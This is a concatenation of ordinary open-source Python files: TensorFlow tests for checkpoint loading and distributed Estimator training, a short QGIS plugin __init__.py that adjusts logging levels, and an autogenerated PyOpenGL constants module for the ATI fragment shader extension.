v1, v2, v3, v4 = _create_checkpoints(session, checkpoint_dir)
self.assertAllEqual(
checkpoint_utils.load_variable(checkpoint_dir, "var1"), v1)
self.assertAllEqual(
checkpoint_utils.load_variable(checkpoint_dir, "var2"), v2)
self.assertAllEqual(
checkpoint_utils.load_variable(checkpoint_dir, "var3"), v3)
self.assertAllEqual(
checkpoint_utils.load_variable(checkpoint_dir, "useful_scope/var4"), v4)
def testGetAllVariables(self):
checkpoint_dir = self.get_temp_dir()
with self.test_session() as session:
_create_checkpoints(session, checkpoint_dir)
self.assertEqual(
checkpoint_utils.list_variables(checkpoint_dir),
[("useful_scope/var4", [9, 9]), ("var1", [1, 10]), ("var2", [10, 10]),
("var3", [100, 100])])
def testInitFromCheckpoint(self):
checkpoint_dir = self.get_temp_dir()
with self.test_session() as session:
v1, v2, v3, v4 = _create_checkpoints(session, checkpoint_dir)
# New graph and session.
with ops.Graph().as_default() as g:
with self.test_session(graph=g) as session:
with variable_scope.variable_scope("some_scope"):
my1 = variable_scope.get_variable("my1", [1, 10])
with variable_scope.variable_scope("some_other_scope"):
my2 = variable_scope.get_variable("my2", [10, 10])
with variable_scope.variable_scope("other_useful_scope"):
my4 = variable_scope.get_variable("var4", [9, 9])
my3 = variable_scope.get_variable("my3", [100, 100])
checkpoint_utils.init_from_checkpoint(checkpoint_dir, {
"var1": "some_scope/my1",
"useful_scope/": "some_scope/some_other_scope/other_useful_scope/",
})
checkpoint_utils.init_from_checkpoint(checkpoint_dir, {
"var2": "some_scope/some_other_scope/my2",
"var3": my3,
})
session.run(variables.global_variables_initializer())
self.assertAllEqual(my1.eval(session), v1)
self.assertAllEqual(my2.eval(session), v2)
self.assertAllEqual(my3.eval(session), v3)
self.assertAllEqual(my4.eval(session), v4)
# Check that tensors are not explicitly in the graph.
self.assertLess(len(str(session.graph.as_graph_def())), 27000)
def testInitFromRootCheckpoint(self):
checkpoint_dir = self.get_temp_dir()
with self.test_session() as session:
v1, v2, v3, v4 = _create_checkpoints(session, checkpoint_dir)
# New graph and session.
with ops.Graph().as_default() as g:
with self.test_session(graph=g) as session:
with variable_scope.variable_scope("some_scope"):
my1 = variable_scope.get_variable("var1", [1, 10])
my2 = variable_scope.get_variable("var2", [10, 10])
my3 = variable_scope.get_variable("var3", [100, 100])
with variable_scope.variable_scope("useful_scope"):
my4 = variable_scope.get_variable("var4", [9, 9])
checkpoint_utils.init_from_checkpoint(checkpoint_dir,
{"/": "some_scope/",})
session.run(variables.global_variables_initializer())
self.assertAllEqual(my1.eval(session), v1)
self.assertAllEqual(my2.eval(session), v2)
self.assertAllEqual(my3.eval(session), v3)
self.assertAllEqual(my4.eval(session), v4)
def testInitFromPartitionVar(self):
checkpoint_dir = self.get_temp_dir()
with self.test_session() as session:
v1 = _create_partition_checkpoints(session, checkpoint_dir)
# New graph and session.
with ops.Graph().as_default() as g:
with self.test_session(graph=g) as session:
with variable_scope.variable_scope("some_scope"):
my1 = variable_scope.get_variable(
name="my1",
shape=[100, 100],
initializer=init_ops.truncated_normal_initializer(0.5),
partitioner=partitioned_variables.min_max_variable_partitioner(
max_partitions=5, axis=0, min_slice_size=8 << 10))
my1_var_list = my1._get_variable_list()
with variable_scope.variable_scope("some_other_scope"):
my2 = variable_scope.get_variable(
name="var1",
shape=[100, 100],
initializer=init_ops.truncated_normal_initializer(0.5),
partitioner=partitioned_variables.min_max_variable_partitioner(
max_partitions=5, axis=0, min_slice_size=8 << 10))
my2_var_list = my2._get_variable_list()
checkpoint_utils.init_from_checkpoint(checkpoint_dir, {
"scope/var1": "some_scope/my1",
"scope/": "some_other_scope/"})
session.run(variables.global_variables_initializer())
my1_values = session.run(my1_var_list)
self.assertAllEqual(my1_values, v1)
my2_values = session.run(my2_var_list)
self.assertAllEqual(my2_values, v1)
# New graph and session.
with ops.Graph().as_default() as g:
with self.test_session(graph=g) as session:
with variable_scope.variable_scope("some_scope"):
my1 = variable_scope.get_variable(
name="my1",
shape=[100, 100],
initializer=init_ops.truncated_normal_initializer(0.5),
partitioner=partitioned_variables.min_max_variable_partitioner(
max_partitions=5, axis=0, min_slice_size=8 << 10))
my1_var_list = my1._get_variable_list()
checkpoint_utils.init_from_checkpoint(checkpoint_dir,
{"scope/var1": my1_var_list,})
session.run(variables.global_variables_initializer())
my1_values = session.run(my1_var_list)
self.assertAllEqual(my1_values, v1)
def testInitFromCheckpointMissing(self):
checkpoint_dir = self.get_temp_dir()
with self.test_session() as session:
_, _, _, _ = _create_checkpoints(session, checkpoint_dir)
# New graph and session.
with ops.Graph().as_default() as g:
with self.test_session(graph=g) as session:
with variable_scope.variable_scope("some_scope"):
_ = variable_scope.get_variable("my1", [10, 10])
_ = variable_scope.get_variable(
"my2", [1, 10],
dtype=dtypes.int64,
initializer=init_ops.zeros_initializer())
# No directory.
with self.assertRaises(errors_impl.OpError):
checkpoint_utils.init_from_checkpoint("no_dir",
{"var1": "some_scope/my1"})
# No variable in checkpoint.
with self.assertRaises(ValueError):
checkpoint_utils.init_from_checkpoint(checkpoint_dir,
{"no_var": "some_scope/my1"})
# No variable in the graph.
with self.assertRaises(ValueError):
checkpoint_utils.init_from_checkpoint(checkpoint_dir,
{"var3": "some_scope/no_var"})
# Shape mismatch.
with self.assertRaises(ValueError):
checkpoint_utils.init_from_checkpoint(checkpoint_dir,
{"var1": "some_scope/my1"})
# Variables 'my1' and 'my2' are missing in the given checkpoint scope.
with self.assertRaises(ValueError):
checkpoint_utils.init_from_checkpoint(
checkpoint_dir, {"useful_scope/": "some_scope/"})
# Mapping is not to scope name.
with self.assertRaises(ValueError):
checkpoint_utils.init_from_checkpoint(checkpoint_dir,
{"useful_scope": "some_scope/"})
if __name__ == "__main__":
test.main()
|
asiersarasua/QGIS
|
refs/heads/master
|
python/plugins/processing/gui/__init__.py
|
17
|
# -*- coding: utf-8 -*-
"""
***************************************************************************
__init__.py
---------------------
Date : August 2013
Copyright : (C) 2013 by Victor Olaya
Email : volayaf at gmail dot com
***************************************************************************
* *
* This program is free software; you can redistribute it and/or modify *
* it under the terms of the GNU General Public License as published by *
* the Free Software Foundation; either version 2 of the License, or *
* (at your option) any later version. *
* *
***************************************************************************
"""
__author__ = 'Victor Olaya'
__date__ = 'August 2013'
__copyright__ = '(C) 2013, Victor Olaya'
# This will get replaced with a git SHA1 when you do a git archive
__revision__ = '$Format:%H$'
from qgis.PyQt import uic
import logging
uic.properties.logger.setLevel(logging.WARNING)
uic.uiparser.logger.setLevel(logging.WARNING)
uic.Compiler.qobjectcreator.logger.setLevel(logging.WARNING)
|
xodus7/tensorflow
|
refs/heads/master
|
tensorflow/contrib/distribute/python/estimator_training_test.py
|
6
|
# Copyright 2018 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests that show Distribute Coordinator works with Estimator."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import glob
import json
import os
import sys
import tempfile
import threading
from absl.testing import parameterized
import numpy as np
from tensorflow.contrib.distribute.python import combinations
from tensorflow.contrib.distribute.python import mirrored_strategy
from tensorflow.contrib.distribute.python import multi_worker_test_base
from tensorflow.contrib.distribute.python import parameter_server_strategy
from tensorflow.contrib.optimizer_v2 import adagrad
from tensorflow.python.data.ops import dataset_ops
from tensorflow.python.distribute import distribute_coordinator as dc
from tensorflow.python.distribute import estimator_training as dc_training
from tensorflow.python.distribute.distribute_config import DistributeConfig
from tensorflow.python.eager import context
from tensorflow.python.estimator import exporter as exporter_lib
from tensorflow.python.estimator import run_config as run_config_lib
from tensorflow.python.estimator import training as estimator_training
from tensorflow.python.estimator.canned import dnn_linear_combined
from tensorflow.python.estimator.canned import prediction_keys
from tensorflow.python.estimator.export import export as export_lib
from tensorflow.python.feature_column import feature_column
from tensorflow.python.platform import gfile
from tensorflow.python.platform import test
from tensorflow.python.summary import summary_iterator
from tensorflow.python.summary.writer import writer_cache
BATCH_SIZE = 10
LABEL_DIMENSION = 2
DATA = np.linspace(
0., 2., BATCH_SIZE * LABEL_DIMENSION, dtype=np.float32).reshape(
BATCH_SIZE, LABEL_DIMENSION)
EVAL_NAME = "foo"
EXPORTER_NAME = "saved_model_exporter"
MAX_STEPS = 10
CHIEF = dc._TaskType.CHIEF
EVALUATOR = dc._TaskType.EVALUATOR
WORKER = dc._TaskType.WORKER
PS = dc._TaskType.PS
original_run_std_server = dc._run_std_server
class MockOsEnv(dict):
def __init__(self, *args):
self._thread_local = threading.local()
super(MockOsEnv, self).__init__(*args)
def get(self, key, default):
if not hasattr(self._thread_local, "dict"):
self._thread_local.dict = dict()
if key == "TF_CONFIG":
return dict.get(self._thread_local.dict, key, default)
else:
return dict.get(self, key, default)
def __getitem__(self, key):
if not hasattr(self._thread_local, "dict"):
self._thread_local.dict = dict()
if key == "TF_CONFIG":
return dict.__getitem__(self._thread_local.dict, key)
else:
return dict.__getitem__(self, key)
def __setitem__(self, key, val):
if not hasattr(self._thread_local, "dict"):
self._thread_local.dict = dict()
if key == "TF_CONFIG":
return dict.__setitem__(self._thread_local.dict, key, val)
else:
return dict.__setitem__(self, key, val)
class DistributeCoordinatorIntegrationTest(test.TestCase,
parameterized.TestCase):
@classmethod
def setUpClass(cls):
"""Create a local cluster with 2 workers."""
cls._cluster_spec = multi_worker_test_base.create_in_process_cluster(
num_workers=3, num_ps=2, has_eval=True)
def setUp(self):
self._model_dir = tempfile.mkdtemp()
self._mock_os_env = MockOsEnv()
self._mock_context = test.mock.patch.object(os, "environ",
self._mock_os_env)
super(DistributeCoordinatorIntegrationTest, self).setUp()
self._mock_context.__enter__()
def tearDown(self):
self._mock_context.__exit__(None, None, None)
super(DistributeCoordinatorIntegrationTest, self).tearDown()
def dataset_input_fn(self, x, y, batch_size, shuffle):
def input_fn():
dataset = dataset_ops.Dataset.from_tensor_slices((x, y))
if shuffle:
dataset = dataset.shuffle(batch_size)
dataset = dataset.repeat(100).batch(batch_size)
return dataset
return input_fn
def _get_exporter(self, name, fc):
feature_spec = feature_column.make_parse_example_spec(fc)
serving_input_receiver_fn = (
export_lib.build_parsing_serving_input_receiver_fn(feature_spec))
return exporter_lib.LatestExporter(
name, serving_input_receiver_fn=serving_input_receiver_fn)
def _extract_loss_and_global_step(self, event_folder):
"""Returns the loss and global step in last event."""
event_paths = glob.glob(os.path.join(event_folder, "events*"))
loss = None
global_step_count = None
for e in summary_iterator.summary_iterator(event_paths[-1]):
current_loss = None
for v in e.summary.value:
if v.tag == "loss":
current_loss = v.simple_value
# If loss is not found, global step is meaningless.
if current_loss is None:
continue
current_global_step = e.step
if global_step_count is None or current_global_step > global_step_count:
global_step_count = current_global_step
loss = current_loss
return (loss, global_step_count)
def _get_estimator(self,
train_distribute,
eval_distribute,
remote_cluster=None):
input_dimension = LABEL_DIMENSION
linear_feature_columns = [
feature_column.numeric_column("x", shape=(input_dimension,))
]
dnn_feature_columns = [
feature_column.numeric_column("x", shape=(input_dimension,))
]
return dnn_linear_combined.DNNLinearCombinedRegressor(
linear_feature_columns=linear_feature_columns,
dnn_hidden_units=(2, 2),
dnn_feature_columns=dnn_feature_columns,
label_dimension=LABEL_DIMENSION,
model_dir=self._model_dir,
dnn_optimizer=adagrad.AdagradOptimizer(0.001),
linear_optimizer=adagrad.AdagradOptimizer(0.001),
config=run_config_lib.RunConfig(
experimental_distribute=DistributeConfig(
train_distribute=train_distribute,
eval_distribute=eval_distribute,
remote_cluster=remote_cluster)))
def _complete_flow(self,
train_distribute,
eval_distribute,
remote_cluster=None):
estimator = self._get_estimator(train_distribute, eval_distribute,
remote_cluster)
input_dimension = LABEL_DIMENSION
train_input_fn = self.dataset_input_fn(
x={"x": DATA},
y=DATA,
batch_size=BATCH_SIZE // len(train_distribute.worker_devices),
shuffle=True)
if eval_distribute:
eval_batch_size = BATCH_SIZE // len(eval_distribute.worker_devices)
else:
eval_batch_size = BATCH_SIZE
eval_input_fn = self.dataset_input_fn(
x={"x": DATA}, y=DATA, batch_size=eval_batch_size, shuffle=False)
linear_feature_columns = [
feature_column.numeric_column("x", shape=(input_dimension,))
]
dnn_feature_columns = [
feature_column.numeric_column("x", shape=(input_dimension,))
]
feature_columns = linear_feature_columns + dnn_feature_columns
estimator_training.train_and_evaluate(
estimator,
estimator_training.TrainSpec(train_input_fn, max_steps=MAX_STEPS),
estimator_training.EvalSpec(
name=EVAL_NAME,
input_fn=eval_input_fn,
steps=None,
exporters=self._get_exporter(EXPORTER_NAME, feature_columns),
start_delay_secs=0,
throttle_secs=1))
return estimator
def _inspect_train_and_eval_events(self, estimator):
# Make sure nothing is stuck in limbo.
writer_cache.FileWriterCache.clear()
# Examine the training events. Use a range to check global step to avoid
# flakiness due to a global step race condition.
training_loss, _ = self._extract_loss_and_global_step(self._model_dir)
self.assertIsNotNone(training_loss)
# Examine the eval events. The global step should be accurate.
eval_dir = os.path.join(self._model_dir, "eval_" + EVAL_NAME)
eval_loss, eval_global_step = self._extract_loss_and_global_step(
event_folder=eval_dir)
self.assertIsNotNone(eval_loss)
self.assertGreaterEqual(eval_global_step, MAX_STEPS)
# Examine the export folder.
export_dir = os.path.join(
os.path.join(self._model_dir, "export"), EXPORTER_NAME)
self.assertTrue(gfile.Exists(export_dir))
# Examine the ckpt for predict.
def predict_input_fn():
return dataset_ops.Dataset.from_tensor_slices({
"x": DATA
}).batch(BATCH_SIZE)
predicted_proba = np.array([
x[prediction_keys.PredictionKeys.PREDICTIONS]
for x in estimator.predict(predict_input_fn)
])
self.assertAllEqual((BATCH_SIZE, LABEL_DIMENSION), predicted_proba.shape)
@combinations.generate(
combinations.combine(
mode=["graph"],
train_distribute_cls=[
mirrored_strategy.MirroredStrategy,
parameter_server_strategy.ParameterServerStrategy
],
eval_distribute_cls=[
None, mirrored_strategy.MirroredStrategy,
parameter_server_strategy.ParameterServerStrategy
],
required_gpus=1))
def test_complete_flow_standalone_client(self, train_distribute_cls,
eval_distribute_cls):
try:
train_distribute = train_distribute_cls(num_gpus=context.num_gpus())
except TypeError:
train_distribute = train_distribute_cls(num_gpus_per_worker=2)
if eval_distribute_cls:
eval_distribute = eval_distribute_cls()
else:
eval_distribute = None
estimator = self._complete_flow(
train_distribute, eval_distribute, remote_cluster=self._cluster_spec)
self._inspect_train_and_eval_events(estimator)
def _mock_run_std_server(self, *args, **kwargs):
ret = original_run_std_server(*args, **kwargs)
# Wait for all std servers to be brought up in order to reduce the chance of
# remote sessions taking local ports that have been assigned to std servers.
self._barrier.wait()
return ret
def _task_thread(self, train_distribute, eval_distribute, tf_config):
os.environ["TF_CONFIG"] = json.dumps(tf_config)
with test.mock.patch.object(dc, "_run_std_server",
self._mock_run_std_server):
self._complete_flow(train_distribute, eval_distribute)
def _run_task_in_thread(self, cluster_spec, task_type, task_id,
train_distribute, eval_distribute):
if task_type:
tf_config = {
"cluster": cluster_spec,
"task": {
"type": task_type,
"index": task_id
}
}
else:
tf_config = {
"cluster": cluster_spec,
"task": {
"type": task_type,
"index": task_id
}
}
t = threading.Thread(
target=self._task_thread,
args=(train_distribute, eval_distribute, tf_config))
t.start()
return t
def _run_multiple_tasks_in_threads(self, cluster_spec, train_distribute,
eval_distribute):
threads = {}
for task_type in cluster_spec.keys():
threads[task_type] = []
for task_id in range(len(cluster_spec[task_type])):
t = self._run_task_in_thread(cluster_spec, task_type, task_id,
train_distribute, eval_distribute)
threads[task_type].append(t)
return threads
@combinations.generate(
combinations.combine(
mode=["graph"],
train_distribute_cls=[
parameter_server_strategy.ParameterServerStrategy,
],
eval_distribute_cls=[
None, mirrored_strategy.MirroredStrategy,
parameter_server_strategy.ParameterServerStrategy
],
required_gpus=1))
def test_complete_flow_independent_worker_between_graph(
self, train_distribute_cls, eval_distribute_cls):
train_distribute = train_distribute_cls(
num_gpus_per_worker=context.num_gpus())
if eval_distribute_cls:
eval_distribute = eval_distribute_cls()
else:
eval_distribute = None
cluster_spec = multi_worker_test_base.create_cluster_spec(
num_workers=3, num_ps=2, has_eval=True)
# 3 workers, 2 ps and 1 evaluator.
self._barrier = dc._Barrier(6)
threads = self._run_multiple_tasks_in_threads(
cluster_spec, train_distribute, eval_distribute)
for task_type, ts in threads.items():
if task_type == PS:
continue
for t in ts:
t.join()
estimator = self._get_estimator(train_distribute, eval_distribute)
self._inspect_train_and_eval_events(estimator)
@combinations.generate(
combinations.combine(
mode=["graph"],
train_distribute_cls=[mirrored_strategy.MirroredStrategy],
eval_distribute_cls=[None, mirrored_strategy.MirroredStrategy],
required_gpus=1))
def test_complete_flow_independent_worker_in_graph(self, train_distribute_cls,
eval_distribute_cls):
train_distribute = train_distribute_cls(num_gpus=context.num_gpus())
if eval_distribute_cls:
eval_distribute = eval_distribute_cls()
else:
eval_distribute = None
cluster_spec = multi_worker_test_base.create_cluster_spec(
num_workers=3, num_ps=0, has_eval=True)
# 3 workers and 1 evaluator.
self._barrier = dc._Barrier(4)
threads = self._run_multiple_tasks_in_threads(
cluster_spec, train_distribute, eval_distribute)
threads[WORKER][0].join()
threads[EVALUATOR][0].join()
estimator = self._get_estimator(train_distribute, eval_distribute)
self._inspect_train_and_eval_events(estimator)
TF_CONFIG_WITH_CHIEF = {
"cluster": {
"chief": ["fake_chief"],
},
"task": {
"type": "chief",
"index": 0
}
}
TF_CONFIG_WITH_MASTER = {
"cluster": {
"master": ["fake_master"],
},
"task": {
"type": "master",
"index": 0
}
}
TF_CONFIG_WITHOUT_TASK = {"cluster": {"chief": ["fake_worker"]}}
class RunConfigTest(test.TestCase):
def test_previously_unexpected_cluster_spec(self):
with test.mock.patch.dict(
"os.environ", {"TF_CONFIG": json.dumps(TF_CONFIG_WITHOUT_TASK)}):
run_config_lib.RunConfig(
experimental_distribute=DistributeConfig(
train_distribute=mirrored_strategy.MirroredStrategy(num_gpus=2)))
def test_should_run_distribute_coordinator(self):
"""Tests that should_run_distribute_coordinator return a correct value."""
# We don't use distribute coordinator for local training.
self.assertFalse(
dc_training.should_run_distribute_coordinator(
run_config_lib.RunConfig()))
# When `train_distribute` is not specified, don't use distribute
# coordinator.
with test.mock.patch.dict("os.environ",
{"TF_CONFIG": json.dumps(TF_CONFIG_WITH_CHIEF)}):
self.assertFalse(
dc_training.should_run_distribute_coordinator(
run_config_lib.RunConfig()))
# When `train_distribute` is specified and TF_CONFIG is detected, use
# distribute coordinator.
with test.mock.patch.dict("os.environ",
{"TF_CONFIG": json.dumps(TF_CONFIG_WITH_CHIEF)}):
config_with_train_distribute = run_config_lib.RunConfig(
experimental_distribute=DistributeConfig(
train_distribute=mirrored_strategy.MirroredStrategy(num_gpus=2)))
config_with_eval_distribute = run_config_lib.RunConfig(
experimental_distribute=DistributeConfig(
eval_distribute=mirrored_strategy.MirroredStrategy(num_gpus=2)))
self.assertTrue(
dc_training.should_run_distribute_coordinator(
config_with_train_distribute))
self.assertFalse(
dc_training.should_run_distribute_coordinator(
config_with_eval_distribute))
# With a master in the cluster, don't run distribute coordinator.
with test.mock.patch.dict("os.environ",
{"TF_CONFIG": json.dumps(TF_CONFIG_WITH_MASTER)}):
config = run_config_lib.RunConfig(
experimental_distribute=DistributeConfig(
train_distribute=mirrored_strategy.MirroredStrategy(num_gpus=2)))
self.assertFalse(dc_training.should_run_distribute_coordinator(config))
def test_init_run_config_duplicate_distribute(self):
with self.assertRaises(ValueError):
run_config_lib.RunConfig(
train_distribute=mirrored_strategy.MirroredStrategy(),
experimental_distribute=DistributeConfig(
train_distribute=mirrored_strategy.MirroredStrategy()))
with self.assertRaises(ValueError):
run_config_lib.RunConfig(
eval_distribute=mirrored_strategy.MirroredStrategy(),
experimental_distribute=DistributeConfig(
eval_distribute=mirrored_strategy.MirroredStrategy()))
def test_init_run_config_none_distribute_coordinator_mode(self):
# We don't use distribute coordinator for local training.
config = run_config_lib.RunConfig(
train_distribute=mirrored_strategy.MirroredStrategy())
dc_training.init_run_config(config, {})
self.assertIsNone(config._distribute_coordinator_mode)
# With a master in the cluster, don't run distribute coordinator.
with test.mock.patch.dict("os.environ",
{"TF_CONFIG": json.dumps(TF_CONFIG_WITH_MASTER)}):
config = run_config_lib.RunConfig(
train_distribute=mirrored_strategy.MirroredStrategy())
self.assertIsNone(config._distribute_coordinator_mode)
# When `train_distribute` is not specified, don't use distribute
# coordinator.
with test.mock.patch.dict("os.environ",
{"TF_CONFIG": json.dumps(TF_CONFIG_WITH_CHIEF)}):
config = run_config_lib.RunConfig()
self.assertFalse(hasattr(config, "_distribute_coordinator_mode"))
def test_init_run_config_independent_worker(self):
# When `train_distribute` is specified and TF_CONFIG is detected, use
# distribute coordinator with INDEPENDENT_WORKER mode.
with test.mock.patch.dict("os.environ",
{"TF_CONFIG": json.dumps(TF_CONFIG_WITH_CHIEF)}):
config = run_config_lib.RunConfig(
train_distribute=mirrored_strategy.MirroredStrategy())
self.assertEqual(config._distribute_coordinator_mode,
dc.CoordinatorMode.INDEPENDENT_WORKER)
def test_init_run_config_standalone_client(self):
# When `train_distribute` is specified, TF_CONFIG is detected and
# `experimental.remote_cluster` is set, use distribute coordinator with
# STANDALONE_CLIENT mode.
config = run_config_lib.RunConfig(
train_distribute=mirrored_strategy.MirroredStrategy(),
experimental_distribute=DistributeConfig(
remote_cluster={"chief": ["fake_worker"]}))
self.assertEqual(config._distribute_coordinator_mode,
dc.CoordinatorMode.STANDALONE_CLIENT)
if __name__ == "__main__":
with test.mock.patch.object(sys, "exit", os._exit):
test.main()
|
kenshay/ImageScript
|
refs/heads/master
|
ProgramData/SystemFiles/Python/Lib/site-packages/OpenGL/raw/GL/ATI/fragment_shader.py
|
9
|
'''Autogenerated by xml_generate script, do not edit!'''
from OpenGL import platform as _p, arrays
# Code generation uses this
from OpenGL.raw.GL import _types as _cs
# End users want this...
from OpenGL.raw.GL._types import *
from OpenGL.raw.GL import _errors
from OpenGL.constant import Constant as _C
import ctypes
_EXTENSION_NAME = 'GL_ATI_fragment_shader'
def _f( function ):
return _p.createFunction( function,_p.PLATFORM.GL,'GL_ATI_fragment_shader',error_checker=_errors._error_checker)
GL_2X_BIT_ATI=_C('GL_2X_BIT_ATI',0x00000001)
GL_4X_BIT_ATI=_C('GL_4X_BIT_ATI',0x00000002)
GL_8X_BIT_ATI=_C('GL_8X_BIT_ATI',0x00000004)
GL_ADD_ATI=_C('GL_ADD_ATI',0x8963)
GL_BIAS_BIT_ATI=_C('GL_BIAS_BIT_ATI',0x00000008)
GL_BLUE_BIT_ATI=_C('GL_BLUE_BIT_ATI',0x00000004)
GL_CND0_ATI=_C('GL_CND0_ATI',0x896B)
GL_CND_ATI=_C('GL_CND_ATI',0x896A)
GL_COLOR_ALPHA_PAIRING_ATI=_C('GL_COLOR_ALPHA_PAIRING_ATI',0x8975)
GL_COMP_BIT_ATI=_C('GL_COMP_BIT_ATI',0x00000002)
GL_CON_0_ATI=_C('GL_CON_0_ATI',0x8941)
GL_CON_10_ATI=_C('GL_CON_10_ATI',0x894B)
GL_CON_11_ATI=_C('GL_CON_11_ATI',0x894C)
GL_CON_12_ATI=_C('GL_CON_12_ATI',0x894D)
GL_CON_13_ATI=_C('GL_CON_13_ATI',0x894E)
GL_CON_14_ATI=_C('GL_CON_14_ATI',0x894F)
GL_CON_15_ATI=_C('GL_CON_15_ATI',0x8950)
GL_CON_16_ATI=_C('GL_CON_16_ATI',0x8951)
GL_CON_17_ATI=_C('GL_CON_17_ATI',0x8952)
GL_CON_18_ATI=_C('GL_CON_18_ATI',0x8953)
GL_CON_19_ATI=_C('GL_CON_19_ATI',0x8954)
GL_CON_1_ATI=_C('GL_CON_1_ATI',0x8942)
GL_CON_20_ATI=_C('GL_CON_20_ATI',0x8955)
GL_CON_21_ATI=_C('GL_CON_21_ATI',0x8956)
GL_CON_22_ATI=_C('GL_CON_22_ATI',0x8957)
GL_CON_23_ATI=_C('GL_CON_23_ATI',0x8958)
GL_CON_24_ATI=_C('GL_CON_24_ATI',0x8959)
GL_CON_25_ATI=_C('GL_CON_25_ATI',0x895A)
GL_CON_26_ATI=_C('GL_CON_26_ATI',0x895B)
GL_CON_27_ATI=_C('GL_CON_27_ATI',0x895C)
GL_CON_28_ATI=_C('GL_CON_28_ATI',0x895D)
GL_CON_29_ATI=_C('GL_CON_29_ATI',0x895E)
GL_CON_2_ATI=_C('GL_CON_2_ATI',0x8943)
GL_CON_30_ATI=_C('GL_CON_30_ATI',0x895F)
GL_CON_31_ATI=_C('GL_CON_31_ATI',0x8960)
GL_CON_3_ATI=_C('GL_CON_3_ATI',0x8944)
GL_CON_4_ATI=_C('GL_CON_4_ATI',0x8945)
GL_CON_5_ATI=_C('GL_CON_5_ATI',0x8946)
GL_CON_6_ATI=_C('GL_CON_6_ATI',0x8947)
GL_CON_7_ATI=_C('GL_CON_7_ATI',0x8948)
GL_CON_8_ATI=_C('GL_CON_8_ATI',0x8949)
GL_CON_9_ATI=_C('GL_CON_9_ATI',0x894A)
GL_DOT2_ADD_ATI=_C('GL_DOT2_ADD_ATI',0x896C)
GL_DOT3_ATI=_C('GL_DOT3_ATI',0x8966)
GL_DOT4_ATI=_C('GL_DOT4_ATI',0x8967)
GL_EIGHTH_BIT_ATI=_C('GL_EIGHTH_BIT_ATI',0x00000020)
GL_FRAGMENT_SHADER_ATI=_C('GL_FRAGMENT_SHADER_ATI',0x8920)
GL_GREEN_BIT_ATI=_C('GL_GREEN_BIT_ATI',0x00000002)
GL_HALF_BIT_ATI=_C('GL_HALF_BIT_ATI',0x00000008)
GL_LERP_ATI=_C('GL_LERP_ATI',0x8969)
GL_MAD_ATI=_C('GL_MAD_ATI',0x8968)
GL_MOV_ATI=_C('GL_MOV_ATI',0x8961)
GL_MUL_ATI=_C('GL_MUL_ATI',0x8964)
GL_NEGATE_BIT_ATI=_C('GL_NEGATE_BIT_ATI',0x00000004)
GL_NUM_FRAGMENT_CONSTANTS_ATI=_C('GL_NUM_FRAGMENT_CONSTANTS_ATI',0x896F)
GL_NUM_FRAGMENT_REGISTERS_ATI=_C('GL_NUM_FRAGMENT_REGISTERS_ATI',0x896E)
GL_NUM_INPUT_INTERPOLATOR_COMPONENTS_ATI=_C('GL_NUM_INPUT_INTERPOLATOR_COMPONENTS_ATI',0x8973)
GL_NUM_INSTRUCTIONS_PER_PASS_ATI=_C('GL_NUM_INSTRUCTIONS_PER_PASS_ATI',0x8971)
GL_NUM_INSTRUCTIONS_TOTAL_ATI=_C('GL_NUM_INSTRUCTIONS_TOTAL_ATI',0x8972)
GL_NUM_LOOPBACK_COMPONENTS_ATI=_C('GL_NUM_LOOPBACK_COMPONENTS_ATI',0x8974)
GL_NUM_PASSES_ATI=_C('GL_NUM_PASSES_ATI',0x8970)
GL_QUARTER_BIT_ATI=_C('GL_QUARTER_BIT_ATI',0x00000010)
GL_RED_BIT_ATI=_C('GL_RED_BIT_ATI',0x00000001)
GL_REG_0_ATI=_C('GL_REG_0_ATI',0x8921)
GL_REG_10_ATI=_C('GL_REG_10_ATI',0x892B)
GL_REG_11_ATI=_C('GL_REG_11_ATI',0x892C)
GL_REG_12_ATI=_C('GL_REG_12_ATI',0x892D)
GL_REG_13_ATI=_C('GL_REG_13_ATI',0x892E)
GL_REG_14_ATI=_C('GL_REG_14_ATI',0x892F)
GL_REG_15_ATI=_C('GL_REG_15_ATI',0x8930)
GL_REG_16_ATI=_C('GL_REG_16_ATI',0x8931)
GL_REG_17_ATI=_C('GL_REG_17_ATI',0x8932)
GL_REG_18_ATI=_C('GL_REG_18_ATI',0x8933)
GL_REG_19_ATI=_C('GL_REG_19_ATI',0x8934)
GL_REG_1_ATI=_C('GL_REG_1_ATI',0x8922)
GL_REG_20_ATI=_C('GL_REG_20_ATI',0x8935)
GL_REG_21_ATI=_C('GL_REG_21_ATI',0x8936)
GL_REG_22_ATI=_C('GL_REG_22_ATI',0x8937)
GL_REG_23_ATI=_C('GL_REG_23_ATI',0x8938)
GL_REG_24_ATI=_C('GL_REG_24_ATI',0x8939)
GL_REG_25_ATI=_C('GL_REG_25_ATI',0x893A)
GL_REG_26_ATI=_C('GL_REG_26_ATI',0x893B)
GL_REG_27_ATI=_C('GL_REG_27_ATI',0x893C)
GL_REG_28_ATI=_C('GL_REG_28_ATI',0x893D)
GL_REG_29_ATI=_C('GL_REG_29_ATI',0x893E)
GL_REG_2_ATI=_C('GL_REG_2_ATI',0x8923)
GL_REG_30_ATI=_C('GL_REG_30_ATI',0x893F)
GL_REG_31_ATI=_C('GL_REG_31_ATI',0x8940)
GL_REG_3_ATI=_C('GL_REG_3_ATI',0x8924)
GL_REG_4_ATI=_C('GL_REG_4_ATI',0x8925)
GL_REG_5_ATI=_C('GL_REG_5_ATI',0x8926)
GL_REG_6_ATI=_C('GL_REG_6_ATI',0x8927)
GL_REG_7_ATI=_C('GL_REG_7_ATI',0x8928)
GL_REG_8_ATI=_C('GL_REG_8_ATI',0x8929)
GL_REG_9_ATI=_C('GL_REG_9_ATI',0x892A)
GL_SATURATE_BIT_ATI=_C('GL_SATURATE_BIT_ATI',0x00000040)
GL_SECONDARY_INTERPOLATOR_ATI=_C('GL_SECONDARY_INTERPOLATOR_ATI',0x896D)
GL_SUB_ATI=_C('GL_SUB_ATI',0x8965)
GL_SWIZZLE_STQ_ATI=_C('GL_SWIZZLE_STQ_ATI',0x8977)
GL_SWIZZLE_STQ_DQ_ATI=_C('GL_SWIZZLE_STQ_DQ_ATI',0x8979)
